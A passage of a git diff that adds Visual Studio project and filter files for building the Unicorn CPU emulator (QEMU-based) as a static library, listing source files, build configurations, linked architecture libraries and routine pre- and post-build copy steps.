<ClCompile Include="..\..\..\qemu\qom\container.c" /> + <ClCompile Include="..\..\..\qemu\qom\cpu.c" /> + <ClCompile Include="..\..\..\qemu\qom\object.c" /> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c" /> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c" /> + <ClCompile Include="..\..\..\qemu\util\aes.c" /> + <ClCompile Include="..\..\..\qemu\util\bitmap.c" /> + <ClCompile Include="..\..\..\qemu\util\bitops.c" /> + <ClCompile Include="..\..\..\qemu\util\crc32c.c" /> + <ClCompile Include="..\..\..\qemu\util\cutils.c" /> + <ClCompile Include="..\..\..\qemu\util\error.c" /> + <ClCompile Include="..\..\..\qemu\util\getauxval.c" /> + <ClCompile Include="..\..\..\qemu\util\host-utils.c" /> + <ClCompile Include="..\..\..\qemu\util\module.c" /> + <ClCompile Include="..\..\..\qemu\util\oslib-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c" /> + <ClCompile Include="..\..\..\qemu\vl.c" /> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-types.c" /> + <ClCompile Include="..\qapi-visit.c" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h" /> + <ClInclude Include="..\..\..\include\qemu.h" /> + <ClInclude Include="..\..\..\include\uc_priv.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + <ClInclude Include="..\..\..\qemu\include\config.h" /> + <ClInclude Include="..\..\..\qemu\include\elf.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-tcg.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h" /> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\mcf.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\qdev-core.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\atomic.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\compiler.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\object.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\qom-qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h" /> + <ClInclude Include="..\..\..\qemu\vl.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="..\qapi-types.h" /> + <ClInclude Include="..\qapi-visit.h" /> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild> + </MASM> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>unicorn_static</RootNamespace> + <ProjectName>unicorn_static</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" "$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" "$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj.filters new file mode 100644 index 0000000..121c3ee --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj.filters @@ -0,0 +1,504 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="qemu"> + <UniqueIdentifier>{13755027-3a13-46c3-9468-ed380fcef603}</UniqueIdentifier> + </Filter> + <Filter Include="priv"> + <UniqueIdentifier>{4f904f9f-fd99-4ebe-8db7-2ee2c644c6e4}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\util"> + <UniqueIdentifier>{1f3288bd-38e9-49c1-ae30-6ac4bc1b86c4}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw"> + <UniqueIdentifier>{d98a987f-6e81-4454-9bb4-f79d49d1d8fa}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qapi"> + <UniqueIdentifier>{9b261303-0cae-4e60-8bc9-c63cd6abd5bc}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qobject"> + <UniqueIdentifier>{4078dd72-489d-48e6-a7c7-e27149f9513d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qom"> + <UniqueIdentifier>{9264dcdf-55d8-4416-9b53-7962937b4db5}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw\core"> + <UniqueIdentifier>{973f87b6-2729-473f-bda6-d61d8c799a77}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include"> + <UniqueIdentifier>{235236d2-79fa-48f5-b496-cb79a9290f6b}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\exec"> + <UniqueIdentifier>{4bb86c12-fd75-40be-9891-e4a84ca60703}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\fpu"> + <UniqueIdentifier>{b210c6e7-454a-400c-84c4-d2a10d96db1d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw"> + <UniqueIdentifier>{8bdec3ae-c802-4443-a6f4-e26bd030a1cf}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\arm"> + <UniqueIdentifier>{e7cfa963-4fb5-4c9a-a264-402decbea01d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\cpu"> + <UniqueIdentifier>{1890ac05-1098-492d-bc0d-50b6e8dd7fc0}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\i386"> + <UniqueIdentifier>{76e19a4b-1143-456a-900c-9ce6c9c0d267}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\m68k"> + <UniqueIdentifier>{0e879645-49d7-4d24-9736-f85d69acceda}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\mips"> + <UniqueIdentifier>{9ecedd1d-44a7-40d1-ad99-f06e49b39aa8}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\sparc"> + <UniqueIdentifier>{50ff932c-1464-4742-af74-fc9b42e4ef3a}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi"> + <UniqueIdentifier>{ea61989d-dc0a-4146-87a0-63e5131d5302}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi\qmp"> + <UniqueIdentifier>{044502cd-501d-40eb-86d0-4c8db24104c7}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qemu"> + <UniqueIdentifier>{b1debb6d-f445-4f95-9778-d6b926541606}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qom"> + <UniqueIdentifier>{c5faa816-aae6-41b7-ac8d-40a9783786e0}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\sysemu"> + <UniqueIdentifier>{62c5db3f-0d6d-4a3a-92b7-0cd602058a62}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\list.c"> + <Filter>priv</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\accel.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\glib_compat.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-log.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-timer.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\vl.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qint.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\container.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\cpu.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\object.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\aes.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitmap.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitops.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\crc32c.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\cutils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\getauxval.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\host-utils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\module.c"> + <Filter>qemu\util</Filter> + </ClCompile> + 